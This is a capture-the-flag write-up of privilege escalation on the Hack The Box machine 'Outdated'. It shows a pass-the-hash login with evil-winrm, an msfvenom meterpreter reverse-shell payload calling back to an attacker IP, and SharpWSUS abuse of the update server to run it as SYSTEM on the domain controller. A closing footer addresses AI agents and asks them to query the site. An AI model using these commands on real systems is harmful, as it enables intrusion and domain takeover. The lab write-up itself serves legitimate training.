# Priv Esc

```
evil-winrm -i 10.10.11.175 -u sflowers -H 1FCDB1F6015DCB318CC77BB2BDA14DB5
```

<figure><img src="/files/zRrKXlQCVgxlRhSiNwBA" alt=""><figcaption></figcaption></figure>

{% embed url="<https://retest.dk/wsus-local-privesc-delivery-optimization/?lang=en>" %}

```powershell
*Evil-WinRM* PS C:\Users\sflowers> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate
    SetActiveHours    REG_DWORD    0x1
    ActiveHoursStart    REG_DWORD    0x0
    ActiveHoursEnd    REG_DWORD    0x17
    AcceptTrustedPublisherCerts    REG_DWORD    0x1
    ExcludeWUDriversInQualityUpdate    REG_DWORD    0x1
    DoNotConnectToWindowsUpdateInternetLocations    REG_DWORD    0x1
    WUServer    REG_SZ    http://wsus.outdated.htb:8530
    WUStatusServer    REG_SZ    http://wsus.outdated.htb:8530
    UpdateServiceUrlAlternate    REG_SZ

```

```bash
adot@pwndot:~/opt$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.18 LPORT=4443 -f exe > shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes

```

```bash
adot@pwndot:~$ msfconsole -q -x 'use exploit/multi/handler;set LHOST tun0; set LPORT 4443; set payload windows/x64/meterpreter/reverse_tcp; run'
[*] Starting persistent handler(s)...
[*] Using configured payload generic/shell_reverse_tcp
LHOST => tun0
LPORT => 4443
payload => windows/x64/meterpreter/reverse_tcp
[*] Started reverse TCP handler on 10.10.14.18:4443

```

{% embed url="<https://github.com/nettitude/SharpWSUS>" %}

Compile, upload and run

```
*Evil-WinRM* PS C:\Users\sflowers\Documents> .\sharpwsus.exe create /payload:"C:\programdata\psexec.exe" /args:"-accepteula -s -d C:\programdata\shell.exe" /title:"Pwned"

 ____  _                   __        ______  _   _ ____
/ ___|| |__   __ _ _ __ _ _\ \      / / ___|| | | / ___|
\___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \
 ___) | | | | (_| | |  | |_) \ V  V /  ___) | |_| |___) |
|____/|_| |_|\__,_|_|  | .__/ \_/\_/  |____/ \___/|____/
                       |_|
           Phil Keeble @ Nettitude Red Team

[*] Action: Create Update
[*] Creating patch to use the following:
[*] Payload: psexec.exe
[*] Payload Path: C:\programdata\psexec.exe
[*] Arguments: -accepteula -s -d C:\programdata\shell.exe
[*] Arguments (HTML Encoded): -accepteula -s -d C:\programdata\shell.exe

################# WSUS Server Enumeration via SQL ##################
ServerName, WSUSPortNumber, WSUSContentLocation
-----------------------------------------------
DC, 8530, c:\WSUS\WsusContent

ImportUpdate
Update Revision ID: 30
PrepareXMLtoClient
InjectURL2Download
DeploymentRevision
PrepareBundle
PrepareBundle Revision ID: 31
PrepareXMLBundletoClient
DeploymentRevision

[*] Update created - When ready to deploy use the following command:
[*] SharpWSUS.exe approve /updateid:da80d522-aefa-44c7-9ed9-42970cb23af8 /computername:Target.FQDN /groupname:"Group Name"

[*] To check on the update status use the following command:
[*] SharpWSUS.exe check /updateid:da80d522-aefa-44c7-9ed9-42970cb23af8 /computername:Target.FQDN

[*] To delete the update use the following command:
[*] SharpWSUS.exe delete /updateid:da80d522-aefa-44c7-9ed9-42970cb23af8 /computername:Target.FQDN /groupname:"Group Name"

[*] Create complete

```

```
*Evil-WinRM* PS C:\Users\sflowers\Documents> .\SharpWSUS.exe approve /updateid:da80d522-aefa-44c7-9ed9-42970cb23af8 /computername:DC.outdated.htb /groupname:"PwnedLOL"

 ____  _                   __        ______  _   _ ____
/ ___|| |__   __ _ _ __ _ _\ \      / / ___|| | | / ___|
\___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \
 ___) | | | | (_| | |  | |_) \ V  V /  ___) | |_| |___) |
|____/|_| |_|\__,_|_|  | .__/ \_/\_/  |____/ \___/|____/
                       |_|
           Phil Keeble @ Nettitude Red Team

[*] Action: Approve Update

Targeting DC.outdated.htb
TargetComputer, ComputerID, TargetID
------------------------------------
DC.outdated.htb, bd6d57d0-5e6f-4e74-a789-35c8955299e1, 1
Group Exists = False
Group Created: PwnedLOL
Added Computer To Group
Approved Update

[*] Approve complete

```

```
*Evil-WinRM* PS C:\Users\sflowers\Documents> .\SharpWSUS.exe check /updateid:da80d522-aefa-44c7-9ed9-42970cb23af8 /computername:DC.outdated.htb /groupname:"PwnedLOL"

 ____  _                   __        ______  _   _ ____
/ ___|| |__   __ _ _ __ _ _\ \      / / ___|| | | / ___|
\___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \
 ___) | | | | (_| | |  | |_) \ V  V /  ___) | |_| |___) |
|____/|_| |_|\__,_|_|  | .__/ \_/\_/  |____/ \___/|____/
                       |_|
           Phil Keeble @ Nettitude Red Team

[*] Action: Check Update

Targeting DC.outdated.htb
TargetComputer, ComputerID, TargetID
------------------------------------
DC.outdated.htb, bd6d57d0-5e6f-4e74-a789-35c8955299e1, 1

[*] Update is installed

[*] Check complete

```

<figure><img src="/files/HUQPHEesJrkt2c5cJOM7" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/THRcA8WTk193bQuuHOG8" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://htb.adot8.com/hack-the-box/windows-boxes/outdated/priv-esc.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.